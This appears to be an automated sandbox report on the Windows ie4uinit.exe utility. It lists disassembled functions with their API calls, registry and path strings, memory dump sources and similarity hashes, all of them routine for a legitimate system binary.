Function 00007FF6B5213964 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 166commemoryCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,?,00000000,?,?,00000001,00000000,?,00007FF6B521477E), ref: 00007FF6B52139BB
CoTaskMemAlloc.OLE32(?,?,00000000,?,?,00000001,00000000,?,00007FF6B521477E), ref: 00007FF6B5213A63
memcpy_s.MSVCRT ref: 00007FF6B5213A82
PropVariantClear.OLE32(?,?,00000000,?,?,00000001,00000000,?,00007FF6B521477E), ref: 00007FF6B5213AC0
PropVariantClear.OLE32(?,?,00000000,?,?,00000001,00000000,?,00007FF6B521477E), ref: 00007FF6B5213B1B

Part of subcall function 00007FF6B5211394: _vsnwprintf.MSVCRT ref: 00007FF6B52113D4

SHSetLocalizedName.SHELL32 ref: 00007FF6B5213BC2

Strings

%HOMEDRIVE%%HOMEPATH%, xrefs: 00007FF6B5213A0A
@"%%windir%%\System32\ie4uinit.exe",-%d, xrefs: 00007FF6B52139D8
%windir%\System32\ie4uinit.exe, xrefs: 00007FF6B5213BB8

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ClearPropVariant$AllocCreateInstanceLocalizedNameTask_vsnwprintfmemcpy_s
String ID: %HOMEDRIVE%%HOMEPATH%$%windir%\System32\ie4uinit.exe$@"%%windir%%\System32\ie4uinit.exe",-%d
API String ID: 839107887-2483958424
Opcode ID: 138003da1fc4e3052338b94c18ac13caf96c53c073741587f145ae55acbf6bde
Instruction ID: 1088137dce4f233b6e4d4541d20f4e22334ad12d0e5d0412a4f3a8cd96a88bc0
Opcode Fuzzy Hash: 138003da1fc4e3052338b94c18ac13caf96c53c073741587f145ae55acbf6bde
Instruction Fuzzy Hash: C3712E2671AA5A85EB108F1AEE806A96770FB84F94F444032DF0D87779DF3DE949C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522FBB8 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 141memoryregistryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FF6B522FC0E
RegQueryInfoKeyW.ADVAPI32 ref: 00007FF6B522FC6E
GetProcessHeap.KERNEL32 ref: 00007FF6B522FC92
HeapAlloc.KERNEL32 ref: 00007FF6B522FCA0
RegEnumKeyExW.ADVAPI32 ref: 00007FF6B522FCF0
GetProcessHeap.KERNEL32 ref: 00007FF6B522FD74
HeapFree.KERNEL32 ref: 00007FF6B522FD82
RegCloseKey.ADVAPI32 ref: 00007FF6B522FD91

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection\Users, xrefs: 00007FF6B522FBF6

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Heap$Process$AllocCloseEnumFreeInfoOpenQuery
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection\Users
API String ID: 2872490147-1621995387
Opcode ID: e6d5943c8a1f25b9c243a971c7bba53f5a1afdfbc68f72a13f9018f390b43a38
Instruction ID: 5574b90d1c2505453b60dc463d9d9648c20cbb9c0c076c6886c3d9a962c59cdc
Opcode Fuzzy Hash: e6d5943c8a1f25b9c243a971c7bba53f5a1afdfbc68f72a13f9018f390b43a38
Instruction Fuzzy Hash: 4D51C436A157828AE710CFA9AD807E977A4FB48F58F100135DF49A7A69DF3DD8428700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5217D68 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 88synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF6B5217D7A

Strings

wil, xrefs: 00007FF6B5217D8F, 00007FF6B5217E91

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ObjectSingleWait
String ID: wil
API String ID: 24740636-1589926490
Opcode ID: 5c80fab51faedde322a659711dfeb9a51a672c836d672a0ef49eff2139b8e43e
Instruction ID: c2522fa780cbf6291fe3eff159a9dd2dc213f8618cfbedb4b77b19abe9eb92b5
Opcode Fuzzy Hash: 5c80fab51faedde322a659711dfeb9a51a672c836d672a0ef49eff2139b8e43e
Instruction Fuzzy Hash: 65312921E0E15286F7744A29DF406FB22A19FC5F90F684131DB09C69AEDF7EEC858B41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5216B98 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,?,?,?,00007FF6B521269D), ref: 00007FF6B5216BDD
RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF6B521269D), ref: 00007FF6B5216C02
RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF6B521269D), ref: 00007FF6B5216C1A
RegOpenKeyExW.ADVAPI32(?,?,?,?,?,00007FF6B521269D), ref: 00007FF6B5216C54
RegQueryValueExW.ADVAPI32 ref: 00007FF6B5216C88
RegCloseKey.ADVAPI32 ref: 00007FF6B5216CA6

Strings

SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\InstallInfo, xrefs: 00007FF6B5216BCF, 00007FF6B5216C46
ShowIconsCommand, xrefs: 00007FF6B5216BEB
IconsVisible, xrefs: 00007FF6B5216C6B

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: IconsVisible$SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\InstallInfo$ShowIconsCommand
API String ID: 3677997916-1059487045
Opcode ID: 45de30f276edc796e8929d36aba0ead1cd1ee7ed658fe25d5a13e23702bb7c57
Instruction ID: 192d3080c9a66ce87eea2eaf99bf3a6ce2210c0b4146658df6b2ef45f9a335fc
Opcode Fuzzy Hash: 45de30f276edc796e8929d36aba0ead1cd1ee7ed658fe25d5a13e23702bb7c57
Instruction Fuzzy Hash: 65313E32A09752CAEB249F28EE545A93364FB44F48F400639E74D83A5ADF3CE955CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5212AC0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 60fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B5215974: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B5211773), ref: 00007FF6B52159AD
Part of subcall function 00007FF6B5215974: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B5211773), ref: 00007FF6B5215A1F
Part of subcall function 00007FF6B5215974: PostThreadMessageW.USER32 ref: 00007FF6B5215A39

GetTempPathW.KERNEL32 ref: 00007FF6B5212B00
GetTempFileNameW.KERNEL32 ref: 00007FF6B5212B28
ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6B5212B4B
_wfopen_s.MSVCRT ref: 00007FF6B5212B86
DeleteFileW.KERNEL32 ref: 00007FF6B5212BB9

Part of subcall function 00007FF6B5215BBC: memset.MSVCRT ref: 00007FF6B5215C1C
Part of subcall function 00007FF6B5215BBC: CreateFileW.KERNEL32 ref: 00007FF6B5215C8C
Part of subcall function 00007FF6B5215BBC: GetCurrentProcess.KERNEL32 ref: 00007FF6B5215C9F
Part of subcall function 00007FF6B5215BBC: GetCurrentProcess.KERNEL32 ref: 00007FF6B5215CA8
Part of subcall function 00007FF6B5215BBC: DuplicateHandle.KERNEL32 ref: 00007FF6B5215CD1
Part of subcall function 00007FF6B5215BBC: GetStdHandle.KERNEL32 ref: 00007FF6B5215CE4
Part of subcall function 00007FF6B5215BBC: CreateProcessW.KERNEL32 ref: 00007FF6B5215D3C
Part of subcall function 00007FF6B5215BBC: WaitForSingleObject.KERNEL32 ref: 00007FF6B5215D4F
Part of subcall function 00007FF6B5215BBC: GetLastError.KERNEL32 ref: 00007FF6B5215D60
Part of subcall function 00007FF6B5215BBC: CloseHandle.KERNEL32 ref: 00007FF6B5215E03

Strings

SCS, xrefs: 00007FF6B5212B19
Total Packages Removed from the system: %1!u!, xrefs: 00007FF6B5212BA1
In CmdAdminScavengeSystem, xrefs: 00007FF6B5212ADB
"%windir%\System32\dism.exe" /online /get-packages /format:table /english, xrefs: 00007FF6B5212B44

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: FileHandleProcess$CreateCurrentMessageTemp$CloseDeleteDuplicateEnvironmentErrorExpandFormatLastLocalNameObjectPathPostSingleStringsThreadTimeWait_wfopen_smemset
String ID: "%windir%\System32\dism.exe" /online /get-packages /format:table /english$In CmdAdminScavengeSystem$SCS$Total Packages Removed from the system: %1!u!
API String ID: 3254253212-3963655054
Opcode ID: 5ce44eedace9a54211db577e01de4d108578f12270d809d11a1c7deb675d9434
Instruction ID: 13fe3bb94c922a5b1248b68e0622f66f32c10d4fa613687ab5c3a7fb9c33ca83
Opcode Fuzzy Hash: 5ce44eedace9a54211db577e01de4d108578f12270d809d11a1c7deb675d9434
Instruction Fuzzy Hash: 2C214F61B2A94691EB209F29EE913F62360FF40F44F801032D74EC649BDE3DEA09CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5214968 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 39registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(00007FF6B52125CC), ref: 00007FF6B5214995
RegCloseKey.ADVAPI32 ref: 00007FF6B52149A4
LoadLibraryExW.KERNEL32 ref: 00007FF6B52149B9
GetProcAddress.KERNEL32 ref: 00007FF6B52149D1
FreeLibrary.KERNEL32 ref: 00007FF6B52149FE

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE, xrefs: 00007FF6B521498B
ForceAssoc, xrefs: 00007FF6B52149DC
DllInstall, xrefs: 00007FF6B52149C7
ieframe.dll, xrefs: 00007FF6B52149AC

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Library$AddressCloseFreeLoadOpenProc
String ID: DllInstall$ForceAssoc$Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE$ieframe.dll
API String ID: 2856891894-1005996673
Opcode ID: 89a1f1639d63ee311428ec0d86141fdaea0159f5cc35476d97757c4880470a26
Instruction ID: cde299a8c9aa9fb66439bd6f2bc794e9b3e551ff47594a493c7f6a6b24ab6547
Opcode Fuzzy Hash: 89a1f1639d63ee311428ec0d86141fdaea0159f5cc35476d97757c4880470a26
Instruction Fuzzy Hash: 55117025B0AA0285EF209B19FE442A563A1EF89F80F444135DB4E863AADF3DE949C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522C0C8 Relevance: 15.1, APIs: 10, Instructions: 138COMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32 ref: 00007FF6B522C0E4
GetLastError.KERNEL32 ref: 00007FF6B522C0EE
GetLastError.KERNEL32 ref: 00007FF6B522C106
GetLastError.KERNEL32 ref: 00007FF6B522C249

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$FileSize
String ID:
API String ID: 3064237074-0
Opcode ID: ecb35cecd513e8bc7582a89e6879561ead3e6182c737ef39ba1eb7f2e16f259f
Instruction ID: f70b78c942c5e3c44c2a4de781425e1e131262f7f7f520f3d405cb5d16124773
Opcode Fuzzy Hash: ecb35cecd513e8bc7582a89e6879561ead3e6182c737ef39ba1eb7f2e16f259f
Instruction Fuzzy Hash: 0651C676A1A64287E7209B699E803A976D1FB88B50F104239CB4ED7359DF3DFC45CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5218AEC Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 425COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 00007FF6B5218D3D

Strings

::$DATA, xrefs: 00007FF6B5219041
Software\Microsoft\Windows\CurrentVersion\Policies, xrefs: 00007FF6B5218B04
\\?\UNC\, xrefs: 00007FF6B5218BFD
\\?\, xrefs: 00007FF6B5218C10, 00007FF6B5218CAA

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: wcschr
String ID: ::$DATA$Software\Microsoft\Windows\CurrentVersion\Policies$\\?\$\\?\UNC\
API String ID: 1497570035-3817109965
Opcode ID: 3cbcbc159ef5ef15d30c2d2d0b0e9c040d7ffa2746ddc12a1ee377f093ca5bbf
Instruction ID: 35803e93a5ad812fcf3213bc9e6bbc84fdaaee6ba7946c6da704169954d84386
Opcode Fuzzy Hash: 3cbcbc159ef5ef15d30c2d2d0b0e9c040d7ffa2746ddc12a1ee377f093ca5bbf
Instruction Fuzzy Hash: D2028662F0666284EBA48B29DE403FE26A1BB14F94F544135DB1D876DEDF7EE885C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5216680 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00000000,00000003,?,00007FF6B5215355), ref: 00007FF6B52166BA
IsWow64Process.KERNEL32(?,?,00000000,00000003,?,00007FF6B5215355), ref: 00007FF6B52166C8
ExpandEnvironmentStringsW.KERNEL32(?,?,00000000,00000003,?,00007FF6B5215355), ref: 00007FF6B52166EF

Part of subcall function 00007FF6B5219348: wcsncmp.MSVCRT(?,?,?,?,00000000,00007FF6B522AC11), ref: 00007FF6B5219379

GetNativeSystemInfo.KERNEL32(?,?,00000000,00000003,?,00007FF6B5215355), ref: 00007FF6B521673C
SHGetSpecialFolderPathW.SHELL32(?,?,00000000,00000003,?,00007FF6B5215355), ref: 00007FF6B521675D

Strings

%ProgramW6432%\Internet Explorer, xrefs: 00007FF6B52166E8
Internet Explorer\, xrefs: 00007FF6B5216766
IEXPLORE.EXE, xrefs: 00007FF6B5216702, 00007FF6B521677B

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Process$CurrentEnvironmentExpandFolderInfoNativePathSpecialStringsSystemWow64wcsncmp
String ID: %ProgramW6432%\Internet Explorer$IEXPLORE.EXE$Internet Explorer\
API String ID: 2223505443-224271814
Opcode ID: 9a9f1902cc74c873c43ded97c153d8c50a3f8b10980228495e4a4f7fccfb1f4c
Instruction ID: 6be42cfbdb88c5c27a29f45c9b4641551772ad6e5526c43d2f63a3e8723abe9b
Opcode Fuzzy Hash: 9a9f1902cc74c873c43ded97c153d8c50a3f8b10980228495e4a4f7fccfb1f4c
Instruction Fuzzy Hash: 9831427260975296EB209B29EE511EE6365FB85B44F840032DB4D8399EDF3DE947CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5230FD8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B5230F30: CheckTokenMembership.ADVAPI32 ref: 00007FF6B5230F65
Part of subcall function 00007FF6B5230F30: LocalFree.KERNEL32 ref: 00007FF6B5230F9A

CreateFileMappingW.KERNEL32 ref: 00007FF6B5231021
LocalFree.KERNEL32 ref: 00007FF6B523102F
#791.IERTUTIL ref: 00007FF6B523103F
#791.IERTUTIL ref: 00007FF6B523104E
#134.IERTUTIL ref: 00007FF6B5231066
CloseHandle.KERNEL32 ref: 00007FF6B5231073

Strings

Local\windows_ie_global_counters, xrefs: 00007FF6B5230FFD
l, xrefs: 00007FF6B5231015

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: #791FreeLocal$#134CheckCloseCreateFileHandleMappingMembershipToken
String ID: Local\windows_ie_global_counters$l
API String ID: 3701204471-1037400814
Opcode ID: b623ef545a021c718cf8b48c73dde0d5627b76b704cae681b0da7cb9af6dd8d9
Instruction ID: 4983ad340a0d68755fea34ef2f7144bfd6f4c90ca69f84d1f945f8318481a2e1
Opcode Fuzzy Hash: b623ef545a021c718cf8b48c73dde0d5627b76b704cae681b0da7cb9af6dd8d9
Instruction Fuzzy Hash: 31117B31B166468AFB205F59AE442F93765BF48F64F440235CF5D87295CF3DE9058710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52237B8 Relevance: 13.7, APIs: 9, Instructions: 159synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF6B52237E9
GetLastError.KERNEL32 ref: 00007FF6B52237F6
GetLastError.KERNEL32 ref: 00007FF6B5223806
GetLastError.KERNEL32 ref: 00007FF6B5223816
#76.IERTUTIL ref: 00007FF6B5223874
#654.IERTUTIL ref: 00007FF6B52238D8
#654.IERTUTIL ref: 00007FF6B5223986
#675.IERTUTIL ref: 00007FF6B52239A4
ReleaseMutex.KERNEL32 ref: 00007FF6B52239C0

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$#654$#675MutexObjectReleaseSingleWait
String ID:
API String ID: 2927321091-0
Opcode ID: 0570598328cd0a3445d052660d7ee6fe1f1a9984898ff71ac80689e50312ae1d
Instruction ID: d607d0e344478740e5f8d00567cdcbd268ebcf64ea0511ec2b4adb1c01b5f966
Opcode Fuzzy Hash: 0570598328cd0a3445d052660d7ee6fe1f1a9984898ff71ac80689e50312ae1d
Instruction Fuzzy Hash: D361833AA1A64286FB109F29DE802BA6765BF54F44F040135CB4DC769ADF3EEC45C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521E6DC Relevance: 13.6, APIs: 9, Instructions: 147COMMON

Download Yara Rule

APIs

StrCmpICW.SHLWAPI ref: 00007FF6B521E703
StrCmpICW.SHLWAPI ref: 00007FF6B521E71A
StrCmpICW.SHLWAPI ref: 00007FF6B521E731
StrCmpICW.SHLWAPI ref: 00007FF6B521E748
StrCmpICW.SHLWAPI ref: 00007FF6B521E75F
StrCmpICW.SHLWAPI ref: 00007FF6B521E772
StrCmpICW.SHLWAPI ref: 00007FF6B521E785
StrCmpICW.SHLWAPI ref: 00007FF6B521E798
SysFreeString.OLEAUT32 ref: 00007FF6B521E86C

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 7b290ba838e9cbb41a975afbe13c9ea87afda25f0d971c499159bed4490d70b4
Instruction ID: 0ebb7dab6f8d26ef6f1112b375ccbc5c7ac324c3b9de7dd8f703783c05029ddc
Opcode Fuzzy Hash: 7b290ba838e9cbb41a975afbe13c9ea87afda25f0d971c499159bed4490d70b4
Instruction Fuzzy Hash: D961DB65A0AA1689FB149F2ACE943B92760EB48FC4F144071DF1E877AADF7DD845C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521A040 Relevance: 13.6, APIs: 9, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

#57.IERTUTIL(00007FF6B521A530), ref: 00007FF6B521A068
GetLengthSid.ADVAPI32 ref: 00007FF6B521A07B
LocalAlloc.KERNEL32 ref: 00007FF6B521A0B0
memset.MSVCRT ref: 00007FF6B521A0C6
memcpy_s.MSVCRT ref: 00007FF6B521A0D8
AddAccessAllowedAceEx.ADVAPI32 ref: 00007FF6B521A0FC
GetLastError.KERNEL32 ref: 00007FF6B521A10D
LocalFree.KERNEL32 ref: 00007FF6B521A124
LocalFree.KERNEL32 ref: 00007FF6B521A13D

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Local$Free$AccessAllocAllowedErrorLastLengthmemcpy_smemset
String ID:
API String ID: 916274048-0
Opcode ID: 86ce98882c31649041cf60e8fa346dc71d9fcae545289237fbed76604f7cf3fa
Instruction ID: 2038ce6e88cbeaddd56bf1b1029b41c6d9bb2a07f34b4f8bb39318c5c4454afb
Opcode Fuzzy Hash: 86ce98882c31649041cf60e8fa346dc71d9fcae545289237fbed76604f7cf3fa
Instruction Fuzzy Hash: 69319021B0972286EB149F6AEE4017A72A5BF84F90F548135CF4987759DF3CE8068394

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52272E8 Relevance: 13.6, APIs: 9, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 00007FF6B5227302
MultiByteToWideChar.KERNEL32 ref: 00007FF6B522731F
SysAllocStringLen.OLEAUT32 ref: 00007FF6B522732C
MultiByteToWideChar.KERNEL32 ref: 00007FF6B522734F
SysFreeString.OLEAUT32 ref: 00007FF6B522735C
SysStringLen.OLEAUT32 ref: 00007FF6B522736C
VarBstrCat.OLEAUT32 ref: 00007FF6B5227386
SysFreeString.OLEAUT32 ref: 00007FF6B5227395
SysFreeString.OLEAUT32 ref: 00007FF6B52273A8

Memory Dump Source

